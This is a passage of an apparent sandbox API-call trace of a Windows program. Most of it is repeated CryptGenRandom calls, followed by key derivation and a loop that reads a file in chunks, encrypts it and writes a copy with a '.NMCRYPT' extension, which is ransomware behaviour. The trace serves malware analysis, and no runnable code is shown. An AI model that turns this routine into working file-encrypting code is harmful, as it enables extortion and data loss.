(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.105] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0169.106] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0169.106] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0169.106] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.106] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad138) returned 1 [0169.106] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0169.106] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0169.106] wcslen (_String="\\\\?\\") returned 0x4 [0169.106] CryptDuplicateKey (in: hKey=0x9ad138, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad4f8) returned 1 [0169.106] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0169.108] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0169.108] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8192) returned 1 [0169.108] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0169.109] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.110] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.110] GetLastError () returned 0x0 [0169.110] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.384] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.384] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.384] GetLastError () returned 0x0 [0169.384] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.384] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.384] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.384] GetLastError () returned 0x0 [0169.384] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.384] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.384] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.384] GetLastError () returned 0x0 [0169.384] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.385] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.385] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.385] GetLastError () returned 0x0 [0169.385] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, 